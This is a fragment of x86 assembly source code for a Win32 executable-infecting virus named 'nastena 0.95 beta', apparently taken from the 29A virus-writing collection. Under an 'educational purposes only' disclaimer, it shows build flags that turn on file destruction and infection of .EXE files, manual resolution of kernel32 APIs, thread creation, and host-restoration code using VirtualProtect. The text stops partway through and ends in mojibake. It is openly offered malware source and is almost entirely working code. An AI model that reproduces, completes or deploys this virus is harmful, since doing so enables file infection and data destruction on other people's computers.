29a-7.017

从29A上收集的病毒源码

;============================nastena 0.95 beta==============================;
;    This source is for educational purposes only. Author does not take		;
;            responsibility for the consequences of its usage				;
;					This is open-source program								;
.586
locals 
jumps
.model flat, stdcall

DEBUG equ 1			; debug console
RELEASE	equ 0	; 
NORELEASE	equ 1
;RELEASE=0 NORELEASE=1 - 	destruction off, infecting *.MZD, 
;					beep at infection
;RELEASE=1 NORELEASE=0 - 	destruction on,  infecting *.EXE

callW macro f
extrn f:proc
	call f
endm

include windows.inc
include consts.inc
include pestruct.inc
include structs.inc
include eaxapi1.inc ;definitions of macro
MB_TOPMOST	equ 40000h

.data
start:

	mov 1 ptr [dropper], 1
	lea eax, [_start]
	push esp esp 0 0 eax 10000h 0
	callW CreateThread
	pop ecx

	
_exit:
	push 30000
	callW Sleep
	push 0
	callW ExitProcess


;org 100h
db ".beg."
virstart:
_realstart:
	;  after decryption execution gets here
_start:
	call recalc
recalc:
rec	db 5Dh ; pop ebp

	call get_kernel
	push kernel32_api_num
	pop ecx
__Kernel32 equ _LoadLibraryA-5
	lea esi, [ebp+__Kernel32-rec]
	call get_apis ; get kernel32 apis


	lea eax, [ebp+thread1-rec]
	push esp esp 0 0 eax 10000h 0
	xcall CreateThread
	pop ecx

	push 80
	xcall Sleep

	; restore host program if not dropper
	cmp 1 ptr [ebp+dropper-rec], 0
	jnz __567
	lea ebx, [ebp+replace-rec]
	mov edi, [ebx].to_rva
	lea esi, [ebp+backup-rec]
	mov ecx, [ebx].sizeinbytes
	pushad
	push esp
	push esp
	push PAGE_READWRITE
	push ecx
	push edi
	xcall VirtualProtect
	pop eax
	popad
	rep movsb
	; 忸耨蜞